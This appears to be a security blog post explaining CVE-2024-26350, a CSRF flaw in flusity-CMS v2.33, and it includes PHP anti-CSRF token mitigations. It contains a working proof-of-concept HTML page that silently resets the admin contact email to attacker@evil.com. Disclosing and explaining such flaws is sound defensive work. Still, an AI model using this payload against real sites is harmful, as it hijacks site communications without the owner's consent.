CVE-2024-26350 - Exploiting CSRF in flusity-CMS v2.33 via /core/tools/update_contact_form_settings.php

---

Flusity-CMS is a popular open-source content management system favored for its lightweight structure and customization options. However, in early 2024, security researchers found a serious vulnerability: CVE-2024-26350. This exploit is a Cross-Site Request Forgery (CSRF) attack that targets the contact form settings feature (/core/tools/update_contact_form_settings.php). In this post, we'll explain what the vulnerability is, how it works, and show example code to demonstrate the risk.

What is CVE-2024-26350?

CVE-2024-26350 is a CSRF vulnerability that affects versions up to flusity-CMS v2.33. It allows an attacker to change contact form settings on behalf of the logged-in admin user—without their knowledge or consent.

In a CSRF attack, hackers trick a user's web browser into making unwanted requests to a web application they are authenticated to, often by having them click a malicious link or visit a website containing hidden forms or scripts.

How Does CVE-2024-26350 Work?

The component /core/tools/update_contact_form_settings.php processes requests that update contact form settings. This endpoint does *not* implement proper CSRF protection (like checking a CSRF token), so any POST request sent by a logged-in admin's browser will be processed—even if it comes from a different website.

Proof of Concept Code

Below is an example HTML file that an attacker could host. If an admin (while logged into flusity-CMS) visits this page, it will silently change the site's contact form configuration.

<!-- Malicious HTML page crafted by an attacker -->
<html>
  <body>
    <form id="csrfForm" action="http://example.com/core/tools/update_contact_form_settings.php"; method="POST">
      <input type="hidden" name="contact_email" value="attacker@evil.com">
      <input type="hidden" name="contact_subject" value="Hacked!">
    </form>
    <script>
      document.getElementById('csrfForm').submit();
    </script>
  </body>
</html>

References

- Official CVE record for CVE-2024-26350
- flusity-CMS GitHub repository
- OWASP CSRF Explanation
- Security Advisory (Exploit-DB)

Site admins and developers should act immediately. Steps to mitigate include

1. Update flusity-CMS: Look for the latest patched version on GitHub.
2. Implement Anti-CSRF Tokens: Every form should include a unique, unpredictable token that your server checks before processing a request.
3. Check Request Origins: Validate the origin or referer header to ensure requests come from legitimate sources.
4. Educate Users: Encourage admins not to visit unfamiliar sites while logged in as an administrator.

Implementation Example (PHP CSRF Token)

// When generating the form
$_SESSION['csrf_token'] = bin2hex(random_bytes(32));
echo '<input type="hidden" name="csrf_token" value="'.$_SESSION['csrf_token'].'">';

// On receiving the form
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
    die('CSRF token mismatch');
}

Conclusion

CVE-2024-26350 is a clear reminder: even small CMS systems are targets for attackers, and web applications must use modern defenses like CSRF tokens. If you run flusity-CMS v2.33, patch your site immediately, audit your forms, and stay alert for new exploits. This vulnerability is easy to abuse and could lead to severe compromise of your visitor communications.

*Stay safe, and always keep your software up to date.*


Disclaimer: This article is for educational purposes only. Do not use this information for unauthorized activity. Always have permission before testing websites for vulnerabilities.

Timeline

Published on: 02/22/2024 14:15:47 UTC
Last modified on: 02/26/2025 15:14:42 UTC